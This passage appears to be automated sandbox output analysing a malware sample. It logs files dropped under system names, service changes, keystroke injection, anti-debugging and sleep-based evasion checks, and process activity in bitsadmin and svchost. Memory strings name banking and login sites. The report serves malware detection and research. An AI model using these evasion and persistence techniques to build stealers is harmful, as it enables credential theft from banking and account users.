                Source: C:\Users\user\Desktop\uG3I84bQEr.exeFile created: C:\Windows\System32\AppVClient.exeJump to dropped file
                Source: C:\Users\user\Desktop\uG3I84bQEr.exeFile created: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to dropped file
                Source: C:\Users\user\Desktop\uG3I84bQEr.exeFile created: C:\Windows\System32\alg.exeJump to dropped file
                Source: C:\Users\user\Desktop\uG3I84bQEr.exeFile created: C:\Windows\System32\AppVClient.exeJump to dropped file
                Source: C:\Users\user\Desktop\uG3I84bQEr.exeFile created: C:\Windows\System32\alg.exeJump to dropped file
                Source: C:\Users\user\Desktop\uG3I84bQEr.exeCode function: 0_2_00B7CBD0 StrStrIW,CloseHandle,StrStrIW,CloseServiceHandle,OpenServiceW,StrStrIW,_wcslen,ChangeServiceConfigW,StrStrIW,StrStrIW,CloseServiceHandle,CloseHandle,StartServiceW,0_2_00B7CBD0
                Source: C:\Users\user\Desktop\uG3I84bQEr.exeCode function: 0_2_004048D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_004048D7
                Source: C:\Users\user\Desktop\uG3I84bQEr.exeCode function: 0_2_00485376 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,0_2_00485376
                Source: C:\Users\user\Desktop\uG3I84bQEr.exeCode function: 0_2_00423187 EncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00423187
                Source: C:\Users\user\Desktop\uG3I84bQEr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\uG3I84bQEr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\bitsadmin.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\bitsadmin.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\bitsadmin.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\bitsadmin.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\bitsadmin.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

                Malware Analysis System Evasion

                barindex
                Source: C:\Users\user\Desktop\uG3I84bQEr.exeAPI/Special instruction interceptor: Address: DD9C2C
                Source: C:\Windows\SysWOW64\bitsadmin.exeAPI/Special instruction interceptor: Address: 7FFDB442D324
                Source: C:\Windows\SysWOW64\bitsadmin.exeAPI/Special instruction interceptor: Address: 7FFDB442D7E4
                Source: C:\Windows\SysWOW64\bitsadmin.exeAPI/Special instruction interceptor: Address: 7FFDB442D944
                Source: C:\Windows\SysWOW64\bitsadmin.exeAPI/Special instruction interceptor: Address: 7FFDB442D504
                Source: C:\Windows\SysWOW64\bitsadmin.exeAPI/Special instruction interceptor: Address: 7FFDB442D544
                Source: C:\Windows\SysWOW64\bitsadmin.exeAPI/Special instruction interceptor: Address: 7FFDB442D1E4
                Source: C:\Windows\SysWOW64\bitsadmin.exeAPI/Special instruction interceptor: Address: 7FFDB4430154
                Source: C:\Windows\SysWOW64\bitsadmin.exeAPI/Special instruction interceptor: Address: 7FFDB442DA44
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0307096E rdtsc 3_2_0307096E
                Source: C:\Windows\SysWOW64\bitsadmin.exeWindow / User API: threadDelayed 9845Jump to behavior
                Source: C:\Users\user\Desktop\uG3I84bQEr.exeDropped PE file which has not been started: C:\Windows\System32\AppVClient.exeJump to dropped file
                Source: C:\Users\user\Desktop\uG3I84bQEr.exeEvaded block: after key decisiongraph_0-111699
                Source: C:\Users\user\Desktop\uG3I84bQEr.exeAPI coverage: 5.2 %
                Source: C:\Windows\SysWOW64\svchost.exeAPI coverage: 0.6 %
                Source: C:\Users\user\Desktop\uG3I84bQEr.exe TID: 2448Thread sleep time: -30000s >= -30000sJump to behavior
                Source: C:\Program Files (x86)\AiTmROKqKQWqeMjIvbtQffgXEerYwmRmGoSVODMPiW\bGPwjAWMEtES.exe TID: 7000Thread sleep time: -30000s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\bitsadmin.exe TID: 3472Thread sleep count: 127 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\bitsadmin.exe TID: 3472Thread sleep time: -254000s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\bitsadmin.exe TID: 3472Thread sleep count: 9845 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\bitsadmin.exe TID: 3472Thread sleep time: -19690000s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\bitsadmin.exeLast function: Thread delayed
                Source: C:\Windows\SysWOW64\bitsadmin.exeLast function: Thread delayed
                Source: C:\Users\user\Desktop\uG3I84bQEr.exeCode function: 0_2_0046445A GetFileAttributesW,FindFirstFileW,FindClose,0_2_0046445A
                Source: C:\Users\user\Desktop\uG3I84bQEr.exeCode function: 0_2_0046C6D1 FindFirstFileW,FindClose,0_2_0046C6D1
                Source: C:\Users\user\Desktop\uG3I84bQEr.exeCode function: 0_2_0046C75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_0046C75C
                Source: C:\Users\user\Desktop\uG3I84bQEr.exeCode function: 0_2_0046EF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_0046EF95
                Source: C:\Users\user\Desktop\uG3I84bQEr.exeCode function: 0_2_0046F0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_0046F0F2
                Source: C:\Users\user\Desktop\uG3I84bQEr.exeCode function: 0_2_0046F3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_0046F3F3
                Source: C:\Users\user\Desktop\uG3I84bQEr.exeCode function: 0_2_004637EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_004637EF
                Source: C:\Users\user\Desktop\uG3I84bQEr.exeCode function: 0_2_00463B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00463B12
                Source: C:\Users\user\Desktop\uG3I84bQEr.exeCode function: 0_2_0046BCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_0046BCBC
                Source: C:\Users\user\Desktop\uG3I84bQEr.exeCode function: 0_2_004049A0 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_004049A0
                Source: z5f52P3-.7.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
                Source: z5f52P3-.7.drBinary or memory string: secure.bankofamerica.comVMware20,11696487552|UE
                Source: z5f52P3-.7.drBinary or memory string: account.microsoft.com/profileVMware20,11696487552u
                Source: z5f52P3-.7.drBinary or memory string: discord.comVMware20,11696487552f
                Source: z5f52P3-.7.drBinary or memory string: bankofamerica.comVMware20,11696487552x
                Source: z5f52P3-.7.drBinary or memory string: www.interactivebrokers.comVMware20,11696487552}
                Source: uG3I84bQEr.exe, 00000000.00000002.2247618432.0000000000DBA000.00000004.00000020.00020000.00000000.sdmp, uG3I84bQEr.exe, 00000000.00000002.2247870943.0000000000DDB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: z5f52P3-.7.drBinary or memory string: ms.portal.azure.comVMware20,11696487552
                Source: z5f52P3-.7.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696487552
                Source: z5f52P3-.7.drBinary or memory string: tasks.office.comVMware20,11696487552o
                Source: z5f52P3-.7.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
                Source: z5f52P3-.7.drBinary or memory string: global block list test formVMware20,11696487552
                Source: z5f52P3-.7.drBinary or memory string: AMC password management pageVMware20,11696487552
                Source: bGPwjAWMEtES.exe, 00000006.00000002.3472111395.000000000120E000.00000004.00000020.00020000.00000000.sdmp, bitsadmin.exe, 00000007.00000002.3470880703.0000000002E12000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: z5f52P3-.7.drBinary or memory string: interactivebrokers.co.inVMware20,11696487552d
                Source: z5f52P3-.7.drBinary or memory string: interactivebrokers.comVMware20,11696487552
                Source: z5f52P3-.7.drBinary or memory string: dev.azure.comVMware20,11696487552j
                Source: z5f52P3-.7.drBinary or memory string: Interactive Brokers - HKVMware20,11696487552]
                Source: z5f52P3-.7.drBinary or memory string: microsoft.visualstudio.comVMware20,11696487552x
                Source: bitsadmin.exe, 00000007.00000002.3474681876.0000000007B33000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: nsaction PasswordVMware20,11696487552}
                Source: z5f52P3-.7.drBinary or memory string: netportal.hdfcbank.comVMware20,11696487552
                Source: bitsadmin.exe, 00000007.00000002.3474681876.0000000007B33000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: .comVMware20,1162
                Source: z5f52P3-.7.drBinary or memory string: trackpan.utiitsl.comVMware20,11696487552h
                Source: z5f52P3-.7.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z
                Source: bitsadmin.exe, 00000007.00000002.3474681876.0000000007B33000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ice.comVMware20,#
                Source: z5f52P3-.7.drBinary or memory string: outlook.office365.comVMware20,11696487552t
                Source: firefox.exe, 0000000A.00000002.2816073834.0000021D4B7AC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll3
                Source: z5f52P3-.7.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696487552~
                Source: z5f52P3-.7.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696487552^
                Source: z5f52P3-.7.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696487552n
                Source: z5f52P3-.7.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p
                Source: z5f52P3-.7.drBinary or memory string: outlook.office.comVMware20,11696487552s
                Source: z5f52P3-.7.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696487552
                Source: z5f52P3-.7.drBinary or memory string: turbotax.intuit.comVMware20,11696487552t
                Source: z5f52P3-.7.drBinary or memory string: Canara Transaction PasswordVMware20,11696487552x
                Source: bitsadmin.exe, 00000007.00000002.3474681876.0000000007B33000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: tVMware20,116964
                Source: z5f52P3-.7.drBinary or memory string: Canara Transaction PasswordVMware20,11696487552}
                Source: z5f52P3-.7.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552
                Source: C:\Windows\SysWOW64\svchost.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeProcess queried: DebugPortJump to behavior
                Source: C:\Windows\SysWOW64\bitsadmin.exeProcess queried: DebugPortJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0307096E rdtsc 3_2_0307096E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_00517B23 LdrLoadDll,3_2_00517B23
                Source: C:\Users\user\Desktop\uG3I84bQEr.exeCode function: 0_2_00473F09 BlockInput,0_2_00473F09
                Source: C:\Users\user\Desktop\uG3I84bQEr.exeCode function: 0_2_00403B3A GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_00403B3A
                Source: C:\Users\user\Desktop\uG3I84bQEr.exeCode function: 0_2_00435A7C EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,0_2_00435A7C
                Source: C:\Users\user\Desktop\uG3I84bQEr.exeCode function: 0_2_00404B37 LoadLibraryA,GetProcAddress,0_2_00404B37
                Source: C:\Users\user\Desktop\uG3I84bQEr.exeCode function: 0_2_0056C594 mov eax, dword ptr fs:[00000030h]0_2_0056C594
                Source: C:\Users\user\Desktop\uG3I84bQEr.exeCode function: 0_2_00B51130 mov eax, dword ptr fs:[00000030h]0_2_00B51130
                Source: C:\Users\user\Desktop\uG3I84bQEr.exeCode function: 0_2_00B93F3D mov eax, dword ptr fs:[00000030h]0_2_00B93F3D
                Source: C:\Users\user\Desktop\uG3I84bQEr.exeCode function: 0_2_00DD8818 mov eax, dword ptr fs:[00000030h]0_2_00DD8818
                Source: C:\Users\user\Desktop\uG3I84bQEr.exeCode function: 0_2_00DD9EF8 mov eax, dword ptr fs:[00000030h]0_2_00DD9EF8
                Source: C:\Users\user\Desktop\uG3I84bQEr.exeCode function: 0_2_00DD9E98 mov eax, dword ptr fs:[00000030h]0_2_00DD9E98
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0306A30B mov eax, dword ptr fs:[00000030h]3_2_0306A30B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0306A30B mov eax, dword ptr fs:[00000030h]3_2_0306A30B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0306A30B mov eax, dword ptr fs:[00000030h]3_2_0306A30B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0302C310 mov ecx, dword ptr fs:[00000030h]3_2_0302C310
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03050310 mov ecx, dword ptr fs:[00000030h]3_2_03050310
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03108324 mov eax, dword ptr fs:[00000030h]3_2_03108324
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03108324 mov ecx, dword ptr fs:[00000030h]3_2_03108324
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03108324 mov eax, dword ptr fs:[00000030h]3_2_03108324
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03108324 mov eax, dword ptr fs:[00000030h]3_2_03108324
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030B2349 mov eax, dword ptr fs:[00000030h]3_2_030B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030B2349 mov eax, dword ptr fs:[00000030h]3_2_030B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030B2349 mov eax, dword ptr fs:[00000030h]3_2_030B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030B2349 mov eax, dword ptr fs:[00000030h]3_2_030B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030B2349 mov eax, dword ptr fs:[00000030h]3_2_030B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030B2349 mov eax, dword ptr fs:[00000030h]3_2_030B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030B2349 mov eax, dword ptr fs:[00000030h]3_2_030B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030B2349 mov eax, dword ptr fs:[00000030h]3_2_030B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030B2349 mov eax, dword ptr fs:[00000030h]3_2_030B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030B2349 mov eax, dword ptr fs:[00000030h]3_2_030B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030B2349 mov eax, dword ptr fs:[00000030h]3_2_030B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030B2349 mov eax, dword ptr fs:[00000030h]3_2_030B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030B2349 mov eax, dword ptr fs:[00000030h]3_2_030B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030B2349 mov eax, dword ptr fs:[00000030h]3_2_030B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030B2349 mov eax, dword ptr fs:[00000030h]3_2_030B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030B035C mov eax, dword ptr fs:[00000030h]3_2_030B035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030B035C mov eax, dword ptr fs:[00000030h]3_2_030B035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030B035C mov eax, dword ptr fs:[00000030h]3_2_030B035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030B035C mov ecx, dword ptr fs:[00000030h]3_2_030B035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030B035C mov eax, dword ptr fs:[00000030h]3_2_030B035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030B035C mov eax, dword ptr fs:[00000030h]3_2_030B035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030FA352 mov eax, dword ptr fs:[00000030h]3_2_030FA352
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030D8350 mov ecx, dword ptr fs:[00000030h]3_2_030D8350
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0310634F mov eax, dword ptr fs:[00000030h]3_2_0310634F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030D437C mov eax, dword ptr fs:[00000030h]3_2_030D437C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0302E388 mov eax, dword ptr fs:[00000030h]3_2_0302E388
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0302E388 mov eax, dword ptr fs:[00000030h]3_2_0302E388
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0302E388 mov eax, dword ptr fs:[00000030h]3_2_0302E388
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0305438F mov eax, dword ptr fs:[00000030h]3_2_0305438F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0305438F mov eax, dword ptr fs:[00000030h]3_2_0305438F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03028397 mov eax, dword ptr fs:[00000030h]3_2_03028397
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03028397 mov eax, dword ptr fs:[00000030h]3_2_03028397
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03028397 mov eax, dword ptr fs:[00000030h]3_2_03028397
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030EC3CD mov eax, dword ptr fs:[00000030h]3_2_030EC3CD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0303A3C0 mov eax, dword ptr fs:[00000030h]3_2_0303A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0303A3C0 mov eax, dword ptr fs:[00000030h]3_2_0303A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0303A3C0 mov eax, dword ptr fs:[00000030h]3_2_0303A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0303A3C0 mov eax, dword ptr fs:[00000030h]3_2_0303A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0303A3C0 mov eax, dword ptr fs:[00000030h]3_2_0303A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0303A3C0 mov eax, dword ptr fs:[00000030h]3_2_0303A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030383C0 mov eax, dword ptr fs:[00000030h]3_2_030383C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030383C0 mov eax, dword ptr fs:[00000030h]3_2_030383C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030383C0 mov eax, dword ptr fs:[00000030h]3_2_030383C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030383C0 mov eax, dword ptr fs:[00000030h]3_2_030383C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030B63C0 mov eax, dword ptr fs:[00000030h]3_2_030B63C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030DE3DB mov eax, dword ptr fs:[00000030h]3_2_030DE3DB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030DE3DB mov eax, dword ptr fs:[00000030h]3_2_030DE3DB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030DE3DB mov ecx, dword ptr fs:[00000030h]3_2_030DE3DB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030DE3DB mov eax, dword ptr fs:[00000030h]3_2_030DE3DB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030D43D4 mov eax, dword ptr fs:[00000030h]3_2_030D43D4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030D43D4 mov eax, dword ptr fs:[00000030h]3_2_030D43D4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030403E9 mov eax, dword ptr fs:[00000030h]3_2_030403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030403E9 mov eax, dword ptr fs:[00000030h]3_2_030403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030403E9 mov eax, dword ptr fs:[00000030h]3_2_030403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030403E9 mov eax, dword ptr fs:[00000030h]3_2_030403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030403E9 mov eax, dword ptr fs:[00000030h]3_2_030403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030403E9 mov eax, dword ptr fs:[00000030h]3_2_030403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030403E9 mov eax, dword ptr fs:[00000030h]3_2_030403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030403E9 mov eax, dword ptr fs:[00000030h]3_2_030403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0304E3F0 mov eax, dword ptr fs:[00000030h]3_2_0304E3F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0304E3F0 mov eax, dword ptr fs:[00000030h]3_2_0304E3F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0304E3F0 mov eax, dword ptr fs:[00000030h]3_2_0304E3F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030663FF mov eax, dword ptr fs:[00000030h]3_2_030663FF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0302823B mov eax, dword ptr fs:[00000030h]3_2_0302823B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030B8243 mov eax, dword ptr fs:[00000030h]3_2_030B8243
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030B8243 mov ecx, dword ptr fs:[00000030h]3_2_030B8243
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0310625D mov eax, dword ptr fs:[00000030h]3_2_0310625D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0302A250 mov eax, dword ptr fs:[00000030h]3_2_0302A250
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03036259 mov eax, dword ptr fs:[00000030h]3_2_03036259
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030EA250 mov eax, dword ptr fs:[00000030h]3_2_030EA250
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030EA250 mov eax, dword ptr fs:[00000030h]3_2_030EA250
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03034260 mov eax, dword ptr fs:[00000030h]3_2_03034260
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03034260 mov eax, dword ptr fs:[00000030h]3_2_03034260
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03034260 mov eax, dword ptr fs:[00000030h]3_2_03034260
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0302826B mov eax, dword ptr fs:[00000030h]3_2_0302826B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030E0274 mov eax, dword ptr fs:[00000030h]3_2_030E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030E0274 mov eax, dword ptr fs:[00000030h]3_2_030E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030E0274 mov eax, dword ptr fs:[00000030h]3_2_030E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030E0274 mov eax, dword ptr fs:[00000030h]3_2_030E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030E0274 mov eax, dword ptr fs:[00000030h]3_2_030E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030E0274 mov eax, dword ptr fs:[00000030h]3_2_030E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030E0274 mov eax, dword ptr fs:[00000030h]3_2_030E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030E0274 mov eax, dword ptr fs:[00000030h]3_2_030E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030E0274 mov eax, dword ptr fs:[00000030h]3_2_030E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030E0274 mov eax, dword ptr fs:[00000030h]3_2_030E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030E0274 mov eax, dword ptr fs:[00000030h]3_2_030E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030E0274 mov eax, dword ptr fs:[00000030h]3_2_030E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0306E284 mov eax, dword ptr fs:[00000030h]3_2_0306E284
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0306E284 mov eax, dword ptr fs:[00000030h]3_2_0306E284
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030B0283 mov eax, dword ptr fs:[00000030h]3_2_030B0283
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030B0283 mov eax, dword ptr fs:[00000030h]3_2_030B0283
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030B0283 mov eax, dword ptr fs:[00000030h]3_2_030B0283
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030C62A0 mov eax, dword ptr fs:[00000030h]3_2_030C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030C62A0 mov ecx, dword ptr fs:[00000030h]3_2_030C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030C62A0 mov eax, dword ptr fs:[00000030h]3_2_030C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030C62A0 mov eax, dword ptr fs:[00000030h]3_2_030C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030C62A0 mov eax, dword ptr fs:[00000030h]3_2_030C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_030C62A0 mov eax, dword ptr fs:[00000030h]3_2_030C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0303A2C3 mov eax, dword ptr fs:[00000030h]3_2_0303A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0303A2C3 mov eax, dword ptr fs:[00000030h]3_2_0303A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0303A2C3 mov eax, dword ptr fs:[00000030h]3_2_0303A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0303A2C3 mov eax, dword ptr fs:[00000030h]3_2_0303A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0303A2C3 mov eax, dword ptr fs:[00000030h]3_2_0303A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_031062D6 mov eax, dword ptr fs:[00000030h]3_2_031062D6
